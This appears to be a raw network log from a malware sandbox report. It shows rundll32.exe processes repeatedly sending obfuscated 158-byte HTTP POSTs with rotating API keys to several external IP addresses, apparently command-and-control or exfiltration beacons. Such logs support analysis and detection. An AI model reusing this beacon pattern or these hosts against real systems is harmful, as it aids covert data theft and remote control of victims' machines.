Jul 15, 2024 12:43:02.594928980 CEST	294	OUT	POST / HTTP/1.1 Host: 91.142.74.28 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: YiZpPdDQ Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.7	54489	77.238.224.56	80	1204	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:43:04.334289074 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.224.56 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: GvMb99XD Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.7	54488	77.238.224.56	80	4100	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:43:04.334315062 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.224.56 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: QVp1pS5F Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.7	54490	77.238.229.63	80	4100	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:43:05.927489042 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.229.63 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: ywrUDvvv Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.7	54491	77.238.229.63	80	1204	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:43:05.944766998 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.229.63 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: EjrKgMjc Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.7	54492	77.238.250.123	80	4100	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:43:07.540815115 CEST	296	OUT	POST / HTTP/1.1 Host: 77.238.250.123 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: maeQEA9g Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
Jul 15, 2024 12:43:08.149643898 CEST	183	IN	HTTP/1.1 429 Too Many Requests Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Mon, 15 Jul 2024 10:43:08 GMT Content-Length: 18 Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a Data Ascii: Too many requests

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.7	54493	77.238.250.123	80	1204	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:43:07.593914986 CEST	296	OUT	POST / HTTP/1.1 Host: 77.238.250.123 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: W58wMIhO Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
Jul 15, 2024 12:43:08.192524910 CEST	183	IN	HTTP/1.1 429 Too Many Requests Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Mon, 15 Jul 2024 10:43:08 GMT Content-Length: 18 Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a Data Ascii: Too many requests

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.7	54494	195.2.70.38	80	7236	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:43:08.824940920 CEST	293	OUT	POST / HTTP/1.1 Host: 195.2.70.38 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: 76pmTyO2 Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.7	54495	91.142.74.28	80	7236	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:43:10.586793900 CEST	294	OUT	POST / HTTP/1.1 Host: 91.142.74.28 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: nOhwNJg9 Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.7	54496	77.238.224.56	80	7236	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:43:12.334419966 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.224.56 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: sflXxIDm Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.7	54497	77.238.229.63	80	7236	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:43:13.984504938 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.229.63 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: CplD9LzU Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.7	54498	77.238.250.123	80	7236	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:43:15.636305094 CEST	296	OUT	POST / HTTP/1.1 Host: 77.238.250.123 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: 5vlQ8NfX Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
Jul 15, 2024 12:43:16.226701021 CEST	183	IN	HTTP/1.1 429 Too Many Requests Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Mon, 15 Jul 2024 10:43:16 GMT Content-Length: 18 Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a Data Ascii: Too many requests

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.7	54499	195.2.70.38	80	4100	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:43:38.157838106 CEST	293	OUT	POST / HTTP/1.1 Host: 195.2.70.38 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: 2ZkYyCCV Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.7	54500	195.2.70.38	80	1204	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:43:38.207376003 CEST	293	OUT	POST / HTTP/1.1 Host: 195.2.70.38 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: gZh4Ee4x Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.7	54501	91.142.74.28	80	4100	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:43:39.898102045 CEST	294	OUT	POST / HTTP/1.1 Host: 91.142.74.28 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: yAKsIgQ1 Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.7	54502	91.142.74.28	80	1204	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:43:39.943403959 CEST	294	OUT	POST / HTTP/1.1 Host: 91.142.74.28 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: eykxtZtY Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.7	54503	77.238.224.56	80	4100	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:43:41.654649973 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.224.56 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: zRWJXg24 Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.7	54504	77.238.224.56	80	1204	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:43:41.695380926 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.224.56 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: O5gEw4jy Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.7	54506	77.238.229.63	80	4100	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:43:43.565233946 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.229.63 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: UBYkIZpC Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.7	54505	77.238.229.63	80	1204	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:43:43.565401077 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.229.63 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: 8PAnp0WM Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.7	54507	77.238.250.123	80	1204	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:43:45.201900005 CEST	296	OUT	POST / HTTP/1.1 Host: 77.238.250.123 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: vpwiV9wF Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
